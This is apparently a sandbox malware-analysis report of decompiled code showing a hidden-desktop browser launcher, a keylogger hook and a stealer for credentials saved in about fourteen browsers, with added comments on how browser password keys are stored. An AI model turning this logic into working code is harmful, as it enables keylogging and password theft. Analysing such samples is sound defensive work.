                                  						WaitForSingleObject(_v112.hProcess, 0xffffffff);
                                  						E004036F7( &_v28, "\"");
                                  						E00403447(E004033D1(E004033D1(E0040357C( &_v28, _t469, __eflags, _t355), _t469, __eflags, "\""), _t469, __eflags, "-no-remote -profile \""), __eflags,  &_v12);
                                  						E004033D1(_t266, _t469, __eflags, "\"");
                                  						E00403447( &_v12, __eflags, E004036F7( &_v44, L"\\prefs.js"));
                                  						E00405FEB(_v44);
                                  						_t491 = CreateFileW(_v12, 4, 3, 0, 4, 0x80, 0);
                                  						WriteFile(_t491, "user_pref(\"layers.acceleration.disabled\", true);", 0x30,  &_v80, 0);
                                  						CloseHandle(_t491);
                                  						CreateProcessW(_t355, _v28, 0, 0, 0, 0, 0, 0,  &_v184,  &_v96);
                                  						E00405FEB(_v28);
                                  						_v28 = 0;
                                  						E00405FEB(_v20);
                                  						E00405FEB(_v24);
                                  						_v24 = 0;
                                  						E00405FEB(_v40);
                                  						E00405FEB(_v36);
                                  						E00405FEB(_v12);
                                  						E00405FEB(_v32);
                                  						E00405FEB(_v16);
                                  						_t474 = CreateProcessW | 0xffffffff;
                                  					}
                                  					goto L16;
                                  				} else {
                                  					_t289 = E00412155(E004036F7( &_v16, L"chrome.exe"));
                                  					E00405FEB(_v16);
                                  					_t505 = _t289;
                                  					if(_t289 == 0) {
                                  						E004036F7( &_v20, "\"");
                                  						E004033D1(E004033D1(E0040357C( &_v20, _t466, __eflags, _t355), _t466, __eflags, "\""), _t466, __eflags, " --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11");
                                  						CreateProcessW(_t355, _v20, 0, 0, 0, 0, 0, 0,  &_v184,  &_v96);
                                  					} else {
                                  						_t470 = 0x28;
                                  						E00410C8A( &_v20, _t470, _t505);
                                  						E0040373F( &_v40,  &_v20);
                                  						E00403447( &_v40, _t505, E004036F7( &_v16, L"\\AppData\\Local\\Google\\Chrome\\User Data"));
                                  						E00405FEB(_v16);
                                  						E0040373F( &_v12,  &_v20);
                                  						E00403447( &_v12, _t505, E004036F7( &_v16, L"\\AppData\\Local\\GoogleBackup"));
                                  						E00405FEB(_v16);
                                  						_t494 = _v12;
                                  						_v76.fFlags = 0x414;
                                  						_v76.hwnd = 0;
                                  						_v76.wFunc = 3;
                                  						_v76.pFrom = _t494;
                                  						_v76.pTo = 0;
                                  						_v58 = 0;
                                  						_v50 = 0;
                                  						_v54 = 0;
                                  						SHFileOperationW( &_v76);
                                  						CreateDirectoryW(_t494, 0);
                                  						E004036F7( &_v28, L"xcopy.exe /H /Y /E /C ");
                                  						E00403447(E004033D1( &_v28, _t470, _t505, "\""), _t505,  &_v40);
                                  						E00403447(E004033D1(E004033D1(E004033D1(_t315, _t470, _t505, "\""), _t470, _t505, " "), _t470, _t505, "\""), _t505,  &_v12);
                                  						E004033D1(_t320, _t470, _t505, "\"");
                                  						_t471 = 0x25;
                                  						E00410C8A( &_v36, _t471, _t505);
                                  						E00403447( &_v36, _t505, E004036F7( &_v16, L"\\xcopy.exe"));
                                  						E00405FEB(_v16);
                                  						E00401052( &_v256, 0, 0x44);
                                  						CreateProcessW(_v36, _v28, 0, 0, 0, 0x8000000, 0, 0,  &_v256,  &_v112);
                                  						WaitForSingleObject(_v112, 0xffffffff);
                                  						E004036F7( &_v24, "\"");
                                  						E00403447(E004033D1(E004033D1(E0040357C( &_v24, _t471, _t505, _v32), _t471, _t505, "\""), _t471, _t505, " --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir=\""), _t505,  &_v12);
                                  						E004033D1(_t337, _t471, _t505, "\"");
                                  						CreateProcessW(_v32, _v24, 0, 0, 0, 0, 0, 0,  &_v184,  &_v96);
                                  						E00405FEB(_v24);
                                  						_v24 = 0;
                                  						E00405FEB(_v36);
                                  						E00405FEB(_v28);
                                  						_v28 = 0;
                                  						E00405FEB(_t494);
                                  						E00405FEB(_v40);
                                  					}
                                  					E00405FEB(_v20);
                                  					_push(0xfffffffe);
                                  					L14:
                                  					_pop(_t474);
                                  					L16:
                                  					E00405FEB(_a4);
                                  					return _t474;
                                  				}
                                  			}

                                  APIs
                                  • CreateDesktopW.USER32 ref: 004136DC
                                    • Part of subcall function 00403373: lstrlenW.KERNEL32(74A313FB,00403758,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 0040337A
                                  • AssocQueryStringW.SHLWAPI(00000000,00000002,http,open,?,00000000), ref: 00413722
                                  • PathFindFileNameW.SHLWAPI(?), ref: 0041372F
                                  • CreateProcessW.KERNEL32(00413672,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004138E4
                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?), ref: 004138EB
                                  • CreateProcessW.KERNEL32(-00000008,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00413953
                                  • CharLowerW.USER32(00000000), ref: 00413736
                                    • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 00410CBB
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00403447: lstrcatW.KERNEL32 ref: 00403477
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  • PathFindFileNameW.SHLWAPI(00000006), ref: 00413747
                                  • CharLowerW.USER32(00000000), ref: 0041374E
                                  • SHFileOperationW.SHELL32(?), ref: 0041381F
                                  • CreateDirectoryW.KERNEL32(00000006,00000000,?,?,?,?,?), ref: 00413827
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Create$FilePathlstrlen$CharFindLowerNameProcess$AssocDesktopDirectoryFolderFreeObjectOperationQuerySingleSpecialStringVirtualWaitlstrcatlstrcpy
                                  • String ID: --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11$ --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="$-no-remote -profile "$Path$Profile0$\AppData\Local\GoogleBackup$\AppData\Local\Google\Chrome\User Data$\AppData\Roaming\FirefoxBackup$\AppData\Roaming\Mozilla\Firefox\$\prefs.js$\xcopy.exe$chrome.exe$firefox.exe$http$iexplore.exe$open$profiles.ini$user_pref("layers.acceleration.disabled", true);$vnc$xcopy.exe /H /Y /E /C
                                  • API String ID: 1980048621-2122738177
                                  • Opcode ID: 008eb418cd185a08f061ac9b4d884c46518dc2f5a58d9e4c032b65e020894d83
                                  • Instruction ID: d1ee3767f8a76cc5fff92834ee7294f166e8d308623be65a05114b919e0f7e15
                                  • Opcode Fuzzy Hash: 008eb418cd185a08f061ac9b4d884c46518dc2f5a58d9e4c032b65e020894d83
                                  • Instruction Fuzzy Hash: 11226871A00209ABCB15EBA2DC96EEEBB7CAF44709F10407AF502B61D1DF785B45CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040813A(signed int __ecx, int __edx, long _a4) {
                                  				signed int _v8;
                                  				int _v12;
                                  				short _v24;
                                  				short _v56;
                                  				void* _t21;
                                  				short _t24;
                                  				short _t27;
                                  				void* _t36;
                                  				int _t46;
                                  				signed int _t48;
                                  				WCHAR* _t49;
                                  				WCHAR* _t50;
                                  				long _t57;
                                  				void* _t58;
                                  				short _t59;
                                  				short _t60;
                                  				short _t62;
                                  				short _t63;
                                  				short _t64;
                                  				short _t66;
                                  				short _t67;
                                  				short _t69;
                                  				short _t70;
                                  				short _t71;
                                  				short _t73;
                                  				short _t75;
                                  				short _t77;
                                  				short _t78;
                                  				short _t79;
                                  				signed int _t81;
                                  
                                  				_t55 = __edx;
                                  				_t48 = __ecx;
                                  				_t46 = __ecx;
                                  				_v12 = __edx;
                                  				_v8 = __ecx;
                                  				_t57 = _a4;
                                  				_t21 = __edx - 0x100;
                                  				if(_t21 == 0 || _t21 == 4) {
                                  					_t58 =  *_t57;
                                  					if(_t58 < 0x27) {
                                  						__eflags = _t58 - 0x40;
                                  						if(_t58 <= 0x40) {
                                  							L21:
                                  							__eflags = _t58 - 0x66;
                                  							if(__eflags > 0) {
                                  								__eflags = _t58 - 0xbc;
                                  								if(__eflags > 0) {
                                  									__eflags = _t58 - 0xdb;
                                  									if(__eflags > 0) {
                                  										_t59 = _t58 - 0xdc;
                                  										__eflags = _t59;
                                  										if(_t59 == 0) {
                                  											_t24 = GetAsyncKeyState(0x10);
                                  											_t49 = "|";
                                  											__eflags = _t24;
                                  											if(__eflags == 0) {
                                  												_t49 = "\\";
                                  											}
                                  											L99:
                                  											E004085CB(_t49, _t55, _t90);
                                  											goto L100;
                                  										}
                                  										_t60 = _t59 - 1;
                                  										__eflags = _t60;
                                  										if(_t60 == 0) {
                                  											_t27 = GetAsyncKeyState(0x10);
                                  											_t50 = "}";
                                  											_t55 = "]";
                                  											L76:
                                  											__eflags = _t27;
                                  											_t49 =  ==  ? _t55 : _t50;
                                  											goto L99;
                                  										}
                                  										__eflags = _t60 - 1;
                                  										if(__eflags == 0) {
                                  											_t27 = GetAsyncKeyState(0x10);
                                  											_t50 = "\"";
                                  											_t55 = "\'";
                                  											goto L76;
                                  										}
                                  										L94:
                                  										GetKeyNameTextW((( *(_t57 + 8) << 8) +  *((intOrPtr*)(_t57 + 4)) << 0x10) + 1,  &_v56, 0xf);
                                  										_t49 =  &_v56;
                                  										goto L99;
                                  									}
                                  									if(__eflags == 0) {
                                  										_t27 = GetAsyncKeyState(0x10);
                                  										_t50 = "{";
                                  										_t55 = "[";
                                  										goto L76;
                                  									}
                                  									_t62 = _t58 - 0xbd;
                                  									__eflags = _t62;
                                  									if(_t62 == 0) {
                                  										_t27 = GetAsyncKeyState(0x10);
                                  										_t50 = "_";
                                  										_t55 = "-";
                                  										goto L76;
                                  									}
                                  									_t63 = _t62 - 1;
                                  									__eflags = _t63;
                                  									if(_t63 == 0) {
                                  										_t27 = GetAsyncKeyState(0x10);
                                  										_t50 = ">";
                                  										_t55 = ".";
                                  										goto L76;
                                  									}
                                  									_t64 = _t63 - 1;
                                  									__eflags = _t64;
                                  									if(_t64 == 0) {
                                  										_t27 = GetAsyncKeyState(0x10);
                                  										_t50 = "?";
                                  										_t55 = "/";
                                  										goto L76;
                                  									}
                                  									__eflags = _t64 - 1;
                                  									if(__eflags != 0) {
                                  										goto L94;
                                  									}
                                  									_t27 = GetAsyncKeyState(0x10);
                                  									_t50 = "~";
                                  									_t55 = "`";
                                  									goto L76;
                                  								}
                                  								if(__eflags == 0) {
                                  									_t27 = GetAsyncKeyState(0x10);
                                  									_t50 = "<";
                                  									_t55 = ",";
                                  									goto L76;
                                  								}
                                  								__eflags = _t58 - 0xa3;
                                  								if(_t58 > 0xa3) {
                                  									__eflags = _t58 - 0xa5;
                                  									if(__eflags <= 0) {
                                  										L78:
                                  										_t49 = L"[ALT]";
                                  										goto L99;
                                  									}
                                  									__eflags = _t58 - 0xba;
                                  									if(_t58 == 0xba) {
                                  										_t27 = GetAsyncKeyState(0x10);
                                  										_t50 = ":";
                                  										_t55 = ";";
                                  										goto L76;
                                  									}
                                  									__eflags = _t58 - 0xbb;
                                  									if(__eflags != 0) {
                                  										goto L94;
                                  									}
                                  									_t27 = GetAsyncKeyState(0x10);
                                  									_t50 = "+";
                                  									_t55 = "=";
                                  									goto L76;
                                  								}
                                  								__eflags = _t58 - 0xa2;
                                  								if(__eflags >= 0) {
                                  									L71:
                                  									_t49 = L"[CTRL]";
                                  									goto L99;
                                  								}
                                  								__eflags = _t58 - 0x67;
                                  								if(__eflags == 0) {
                                  									_t49 = "7";
                                  									goto L99;
                                  								}
                                  								__eflags = _t58 - 0x68;
                                  								if(__eflags == 0) {
                                  									_t49 = "8";
                                  									goto L99;
                                  								}
                                  								__eflags = _t58 - 0x69;
                                  								if(__eflags == 0) {
                                  									_t49 = "9";
                                  									goto L99;
                                  								}
                                  								__eflags = _t58 - 0xa0 - 1;
                                  								if(__eflags > 0) {
                                  									goto L94;
                                  								}
                                  								goto L100;
                                  							}
                                  							if(__eflags == 0) {
                                  								_t49 = "6";
                                  								goto L99;
                                  							}
                                  							__eflags = _t58 - 0x20;
                                  							if(__eflags > 0) {
                                  								__eflags = _t58 - 0x62;
                                  								if(__eflags > 0) {
                                  									_t66 = _t58 - 0x63;
                                  									__eflags = _t66;
                                  									if(__eflags == 0) {
                                  										_t49 = "3";
                                  										goto L99;
                                  									}
                                  									_t67 = _t66 - 1;
                                  									__eflags = _t67;
                                  									if(__eflags == 0) {
                                  										_t49 = "4";
                                  										goto L99;
                                  									}
                                  									__eflags = _t67 - 1;
                                  									if(__eflags != 0) {
                                  										goto L94;
                                  									}
                                  									_t49 = "5";
                                  									goto L99;
                                  								}
                                  								if(__eflags == 0) {
                                  									_t49 = "2";
                                  									goto L99;
                                  								}
                                  								_t69 = _t58 - 0x2d;
                                  								__eflags = _t69;
                                  								if(__eflags == 0) {
                                  									_t49 = L"[INSERT]";
                                  									goto L99;
                                  								}
                                  								_t70 = _t69 - 1;
                                  								__eflags = _t70;
                                  								if(__eflags == 0) {
                                  									_t49 = L"[DEL]";
                                  									goto L99;
                                  								}
                                  								_t71 = _t70 - 0x32;
                                  								__eflags = _t71;
                                  								if(__eflags == 0) {
                                  									_t49 = "0";
                                  									goto L99;
                                  								}
                                  								__eflags = _t71 - 1;
                                  								if(__eflags != 0) {
                                  									goto L94;
                                  								}
                                  								_t49 = "1";
                                  								goto L99;
                                  							}
                                  							if(__eflags == 0) {
                                  								_t49 = " ";
                                  								goto L99;
                                  							}
                                  							__eflags = _t58 - 0x11;
                                  							if(__eflags > 0) {
                                  								_t73 = _t58 - 0x12;
                                  								__eflags = _t73;
                                  								if(__eflags == 0) {
                                  									goto L78;
                                  								}
                                  								_t75 = _t73;
                                  								__eflags = _t75;
                                  								if(__eflags == 0) {
                                  									_t49 = L"[CAPS]";
                                  									goto L99;
                                  								}
                                  								__eflags = _t75 - 7;
                                  								if(__eflags != 0) {
                                  									goto L94;
                                  								}
                                  								_t49 = L"[ESC]";
                                  								goto L99;
                                  							}
                                  							if(__eflags == 0) {
                                  								goto L71;
                                  							}
                                  							_t77 = _t58 - 8;
                                  							__eflags = _t77;
                                  							if(__eflags == 0) {
                                  								_t49 = L"[BKSP]";
                                  								goto L99;
                                  							}
                                  							_t78 = _t77 - 1;
                                  							__eflags = _t78;
                                  							if(__eflags == 0) {
                                  								_t49 = L"[TAB]";
                                  								goto L99;
                                  							}
                                  							_t79 = _t78 - 4;
                                  							__eflags = _t79;
                                  							if(__eflags == 0) {
                                  								_t49 = L"[ENTER]\r\n";
                                  								goto L99;
                                  							}
                                  							__eflags = _t79 - 3;
                                  							if(__eflags == 0) {
                                  								goto L100;
                                  							}
                                  							goto L94;
                                  						}
                                  						L19:
                                  						__eflags = _t58 - 0x5b;
                                  						if(_t58 >= 0x5b) {
                                  							goto L21;
                                  						}
                                  						_t36 = E004085C0();
                                  						__eflags = GetAsyncKeyState(0x10);
                                  						__eflags = E004085AE(_t48 & 0xffffff00 | GetAsyncKeyState(0x10) != 0x00000000, _t36);
                                  						_t53 =  !=  ? _t58 : _t58 + 0x20;
                                  						wsprintfW( &_v24, L"%c",  !=  ? _t58 : _t58 + 0x20);
                                  						E004085CB( &_v24, _t36, __eflags);
                                  						_t46 = _v8;
                                  						goto L100;
                                  					}
                                  					if(_t58 > 0x40) {
                                  						goto L19;
                                  					}
                                  					if(GetAsyncKeyState(0x10) == 0) {
                                  						wsprintfW( &_v24, L"%c", _t58);
                                  						_t49 =  &_v24;
                                  						goto L99;
                                  					}
                                  					_t81 = _t58 + 0xffffffd0;
                                  					_t90 = _t81 - 9;
                                  					if(_t81 > 9) {
                                  						goto L100;
                                  					}
                                  					switch( *((intOrPtr*)(_t81 * 4 +  &M00408586))) {
                                  						case 0:
                                  							_t49 = ")";
                                  							goto L99;
                                  						case 1:
                                  							__ecx = "!";
                                  							goto L99;
                                  						case 2:
                                  							__ecx = "@";
                                  							goto L99;
                                  						case 3:
                                  							__ecx = "#";
                                  							goto L99;
                                  						case 4:
                                  							__ecx = "$";
                                  							goto L99;
                                  						case 5:
                                  							__ecx = "%";
                                  							goto L99;
                                  						case 6:
                                  							__ecx = "^";
                                  							goto L99;
                                  						case 7:
                                  							__ecx = "&";
                                  							goto L99;
                                  						case 8:
                                  							__ecx = "*";
                                  							goto L99;
                                  						case 9:
                                  							__ecx = "(";
                                  							goto L99;
                                  					}
                                  				} else {
                                  					L100:
                                  					return CallNextHookEx(0, _t46, _v12, _t57);
                                  				}
                                  			}

                                  APIs
                                  • GetAsyncKeyState.USER32 ref: 00408176
                                  • CallNextHookEx.USER32 ref: 00408577
                                    • Part of subcall function 004085CB: GetForegroundWindow.USER32 ref: 004085F4
                                    • Part of subcall function 004085CB: GetWindowTextW.USER32 ref: 00408607
                                    • Part of subcall function 004085CB: lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00408670
                                    • Part of subcall function 004085CB: CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000), ref: 004086DE
                                    • Part of subcall function 004085CB: lstrlenW.KERNEL32(00417A60,00000008,00000000,?,?), ref: 00408707
                                    • Part of subcall function 004085CB: WriteFile.KERNEL32(?,00417A60,00000000,?,?), ref: 00408713
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileWindowlstrlen$AsyncCallCreateForegroundHookNextStateTextWrite
                                  • String ID: [ALT]$[BKSP]$[CAPS]$[CTRL]$[DEL]$[ENTER]$[ESC]$[INSERT]$[TAB]
                                  • API String ID: 2452648998-4143582258
                                  • Opcode ID: 881548f72cfd94900db163d355712600b34b549d501f703e75189cd75d0e76ec
                                  • Instruction ID: 005c92b7aa13bd5785e0d60a0273475475fd8f33417f3dbf942b8c71a30de329
                                  • Opcode Fuzzy Hash: 881548f72cfd94900db163d355712600b34b549d501f703e75189cd75d0e76ec
                                  • Instruction Fuzzy Hash: 0791C132A4C910ABCB1892288F586BA2531A7917A4F10C17FD9C3B77D1DF7C9E82524F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E0040B917(void* __edx, intOrPtr _a4) {
                                  				char _v48;
                                  				char _v56;
                                  				char _v60;
                                  				char _v324;
                                  				intOrPtr _v328;
                                  				char _v332;
                                  				char _v336;
                                  				char _v340;
                                  				char _v344;
                                  				intOrPtr _v352;
                                  				void* _t31;
                                  				intOrPtr* _t59;
                                  				intOrPtr* _t66;
                                  				intOrPtr _t67;
                                  				intOrPtr _t72;
                                  				intOrPtr _t73;
                                  				intOrPtr* _t76;
                                  				intOrPtr* _t78;
                                  				intOrPtr* _t80;
                                  				intOrPtr* _t84;
                                  				intOrPtr* _t86;
                                  				intOrPtr* _t88;
                                  				intOrPtr* _t90;
                                  				intOrPtr* _t92;
                                  				intOrPtr* _t94;
                                  				intOrPtr* _t96;
                                  				intOrPtr* _t98;
                                  				intOrPtr* _t100;
                                  				intOrPtr* _t102;
                                  				intOrPtr* _t104;
                                  				intOrPtr* _t106;
                                  				intOrPtr* _t108;
                                  				intOrPtr* _t110;
                                  				intOrPtr* _t112;
                                  				intOrPtr* _t114;
                                  				intOrPtr* _t117;
                                  				intOrPtr* _t120;
                                  				intOrPtr _t126;
                                  				void* _t134;
                                  				void* _t135;
                                  				intOrPtr _t139;
                                  				signed int _t140;
                                  				void* _t142;
                                  
                                  				_t133 = __edx;
                                  				_t142 = (_t140 & 0xfffffff8) - 0x34;
                                  				_t72 = _a4;
                                  				 *0x426864 = _t72;
                                  				_t73 =  *((intOrPtr*)(_t72 + 4));
                                  				E00415847(_t73, __edx,  &_v48,  *((intOrPtr*)(_t72 + 8)), 0);
                                  				_t143 = _v56;
                                  				if(_v56 != 0) {
                                  					_push(_t73);
                                  					E0040315E(_t142,  &_v48);
                                  					_t76 =  *0x426864; // 0x0
                                  					E00409718( *_t76, _t133, _t73);
                                  					_t78 =  *0x426864; // 0x0
                                  					_t31 = E0040973F( *_t78, _t143);
                                  					_t144 = _t31;
                                  					if(_t31 != 0) {
                                  						_t134 = 0x1a;
                                  						E00410C8A( &_v56, _t134, _t144);
                                  						_t135 = 0x1a;
                                  						E00410C8A( &_v60, _t135, _t144);
						_t84 =  *0x426864; // 0x0
						// One E0040BC0D call per browser credential store: (Login Data database, Local State file, two flags, numeric browser id).
						// Local State holds the DPAPI-wrapped AES key that Chromium-based browsers use for the password blobs in Login Data, so both files are needed.
						// Only Opera sets the first flag and only UC Browser the second; the ids run 1, 6, 7 ... 0x12.
						E0040BC0D( *_t84, _t144, L"\\Google\\Chrome\\User Data\\Default\\Login Data", L"\\Google\\Chrome\\User Data\\Local State", 0, 0, 1);
                                  						_t86 =  *0x426864; // 0x0
                                  						E0040BC0D( *_t86, _t144, L"\\Epic Privacy Browser\\User Data\\Default\\Login Data", L"\\Epic Privacy Browser\\User Data\\Local State", 0, 0, 6);
                                  						_t88 =  *0x426864; // 0x0
                                  						E0040BC0D( *_t88, _t144, L"\\Microsoft\\Edge\\User Data\\Default\\Login Data", L"\\Microsoft\\Edge\\User Data\\Local State", 0, 0, 7);
                                  						_t90 =  *0x426864; // 0x0
                                  						E0040BC0D( *_t90, _t144, L"\\UCBrowser\\User Data_i18n\\Default\\UC Login Data.17", L"\\UCBrowser\\User Data_i18n\\Local State", 0, 1, 8);
                                  						_t92 =  *0x426864; // 0x0
                                  						E0040BC0D( *_t92, _t144, L"\\Tencent\\QQBrowser\\User Data\\Default\\Login Data", L"\\Tencent\\QQBrowser\\User Data\\Local State", 0, 0, 9);
                                  						_t94 =  *0x426864; // 0x0
                                  						E0040BC0D( *_t94, _t144, L"\\Opera Software\\Opera Stable\\Login Data", L"\\Opera Software\\Opera Stable\\Local State", 1, 0, 0xa);
                                  						_t96 =  *0x426864; // 0x0
                                  						E0040BC0D( *_t96, _t144, L"\\Blisk\\User Data\\Default\\Login Data", L"\\Blisk\\User Data\\Local State", 0, 0, 0xb);
                                  						_t98 =  *0x426864; // 0x0
                                  						E0040BC0D( *_t98, _t144, L"\\Chromium\\User Data\\Default\\Login Data", L"\\Chromium\\User Data\\Local State", 0, 0, 0xc);
                                  						_t100 =  *0x426864; // 0x0
                                  						E0040BC0D( *_t100, _t144, L"\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data", L"\\BraveSoftware\\Brave-Browser\\User Data\\Local State", 0, 0, 0xd);
                                  						_t102 =  *0x426864; // 0x0
                                  						E0040BC0D( *_t102, _t144, L"\\Vivaldi\\User Data\\Default\\Login Data", L"\\Vivaldi\\User Data\\Local State", 0, 0, 0xe);
                                  						_t104 =  *0x426864; // 0x0
                                  						E0040BC0D( *_t104, _t144, L"\\Comodo\\Dragon\\User Data\\Default\\Login Data", L"\\Comodo\\Dragon\\User Data\\Local State", 0, 0, 0xf);
                                  						_t106 =  *0x426864; // 0x0
                                  						E0040BC0D( *_t106, _t144, L"\\Torch\\User Data\\Default\\Login Data", L"\\Torch\\User Data\\Local State", 0, 0, 0x10);
                                  						_t108 =  *0x426864; // 0x0
                                  						E0040BC0D( *_t108, _t144, L"\\Slimjet\\User Data\\Default\\Login Data", L"\\Slimjet\\User Data\\Local State", 0, 0, 0x11);
                                  						_t110 =  *0x426864; // 0x0
                                  						E0040BC0D( *_t110, _t144, L"\\CentBrowser\\User Data\\Default\\Login Data", L"\\CentBrowser\\User Data\\Local State", 0, 0, 0x12);
                                  						_t112 =  *0x426864; // 0x0
                                  						E0040A968( *_t112, _t135, _t144);
                                  						_t114 =  *0x426864; // 0x0
                                  						E0040983D( *_t114, _t135, _t144);
                                  						E0040373F(_t142,  &_v340);
                                  						_t117 =  *0x426864; // 0x0
                                  						E00409E2D( *_t117, _t144,  *_t114);
                                  						E0040373F(_t142,  &_v344);
                                  						_t120 =  *0x426864; // 0x0
                                  						E0040A36F( *_t120, _t144,  *_t117);
                                  						E004096D6(_t144);
                                  						_t59 =  *0x426864; // 0x0
                                  						E004020F0( &_v340, _t144,  *_t59);
                                  						_v328 = 0x41a830;
                                  						E004020F0( &_v324, _t144,  &_v344);
                                  						_t126 =  *0x426864; // 0x0
                                  						E00405044( *((intOrPtr*)(_t126 + 8)),  &_v332);
                                  						E004154AA( &_v336);
                                  						_t129 = _v352;
                                  						if(_v352 != 0) {
                                  							E00401AD0(_t129, _t129);
                                  						}
                                  						_t66 =  *0x426864; // 0x0
                                  						_t67 =  *_t66;
                                  						_t130 =  *((intOrPtr*)(_t67 + 0x10));
                                  						if( *((intOrPtr*)(_t67 + 0x10)) != 0) {
                                  							E00405FEB(_t130);
                                  						}
                                  						E00405FEB(_v60);
                                  						E00405FEB(_v56);
                                  					}
                                  					_t80 =  *0x426864; // 0x0
                                  					_t139 =  *_t80;
                                  					E00406034(_t80);
                                  					_t22 = _t139 + 0x24; // 0x24
                                  					E00401F98(_t22);
                                  				}
                                  				E00403148( &_v48);
                                  				return 0;
                                  			}
                                  Instruction addresses (report address column): 0x0040b917 .. 0x0040bbff

                                  Strings
                                  • \Blisk\User Data\Default\Login Data, xrefs: 0040BA44
                                  • \Chromium\User Data\Default\Login Data, xrefs: 0040BA5F
                                  • \Blisk\User Data\Local State, xrefs: 0040BA3F
                                  • \UCBrowser\User Data_i18n\Default\UC Login Data.17, xrefs: 0040B9F2
                                  • \Vivaldi\User Data\Local State, xrefs: 0040BA8E
                                  • \Epic Privacy Browser\User Data\Local State, xrefs: 0040B9B6
                                  • \Slimjet\User Data\Local State, xrefs: 0040BAE1
                                  • \UCBrowser\User Data_i18n\Local State, xrefs: 0040B9ED
                                  • \Epic Privacy Browser\User Data\Default\Login Data, xrefs: 0040B9BB
                                  • \Microsoft\Edge\User Data\Local State, xrefs: 0040B9D1
                                  • \Opera Software\Opera Stable\Login Data, xrefs: 0040BA29
                                  • \BraveSoftware\Brave-Browser\User Data\Local State, xrefs: 0040BA75
                                  • \Chromium\User Data\Local State, xrefs: 0040BA5A
                                  • \Comodo\Dragon\User Data\Local State, xrefs: 0040BAAB
                                  • \Torch\User Data\Local State, xrefs: 0040BAC6
                                  • \CentBrowser\User Data\Default\Login Data, xrefs: 0040BB01
                                  • \Google\Chrome\User Data\Local State, xrefs: 0040B99B
                                  • \Slimjet\User Data\Default\Login Data, xrefs: 0040BAE6
                                  • \Comodo\Dragon\User Data\Default\Login Data, xrefs: 0040BAB0
                                  • \Tencent\QQBrowser\User Data\Local State, xrefs: 0040BA08
                                  • \Google\Chrome\User Data\Default\Login Data, xrefs: 0040B9A0
                                  • \BraveSoftware\Brave-Browser\User Data\Default\Login Data, xrefs: 0040BA7A
                                  • \Tencent\QQBrowser\User Data\Default\Login Data, xrefs: 0040BA0D
                                  • \Opera Software\Opera Stable\Local State, xrefs: 0040BA24
                                  • \CentBrowser\User Data\Local State, xrefs: 0040BAFC
                                  • \Torch\User Data\Default\Login Data, xrefs: 0040BACB
                                  • \Microsoft\Edge\User Data\Default\Login Data, xrefs: 0040B9D6
                                  • \Vivaldi\User Data\Default\Login Data, xrefs: 0040BA95
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FilePath$lstrcatlstrcpy$BinaryCopyExistsOpenType$CloseCombineEnumFolderInfoPrivateProfileQuerySpecialString
                                  • String ID: \Blisk\User Data\Default\Login Data$\Blisk\User Data\Local State$\BraveSoftware\Brave-Browser\User Data\Default\Login Data$\BraveSoftware\Brave-Browser\User Data\Local State$\CentBrowser\User Data\Default\Login Data$\CentBrowser\User Data\Local State$\Chromium\User Data\Default\Login Data$\Chromium\User Data\Local State$\Comodo\Dragon\User Data\Default\Login Data$\Comodo\Dragon\User Data\Local State$\Epic Privacy Browser\User Data\Default\Login Data$\Epic Privacy Browser\User Data\Local State$\Google\Chrome\User Data\Default\Login Data$\Google\Chrome\User Data\Local State$\Microsoft\Edge\User Data\Default\Login Data$\Microsoft\Edge\User Data\Local State$\Opera Software\Opera Stable\Local State$\Opera Software\Opera Stable\Login Data$\Slimjet\User Data\Default\Login Data$\Slimjet\User Data\Local State$\Tencent\QQBrowser\User Data\Default\Login Data$\Tencent\QQBrowser\User Data\Local State$\Torch\User Data\Default\Login Data$\Torch\User Data\Local State$\UCBrowser\User Data_i18n\Default\UC Login Data.17$\UCBrowser\User Data_i18n\Local State$\Vivaldi\User Data\Default\Login Data$\Vivaldi\User Data\Local State
                                  • API String ID: 2377953819-4166025770
                                  • Opcode ID: 7f47958bac4a6e5bb76ade14613cb2583ff2f16c54ab432812a73e7ecd254522
                                  • Instruction ID: b504e976bd3a8729c7f51a6cb9f8188f68cbd7fbd8cbaae42897a142990720c6
                                  • Opcode Fuzzy Hash: 7f47958bac4a6e5bb76ade14613cb2583ff2f16c54ab432812a73e7ecd254522
                                  • Instruction Fuzzy Hash: 8C71A730355704ABD224FB62CD62E9A37A9EF89704F10443EF5166B2E1CFB96841CB9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%
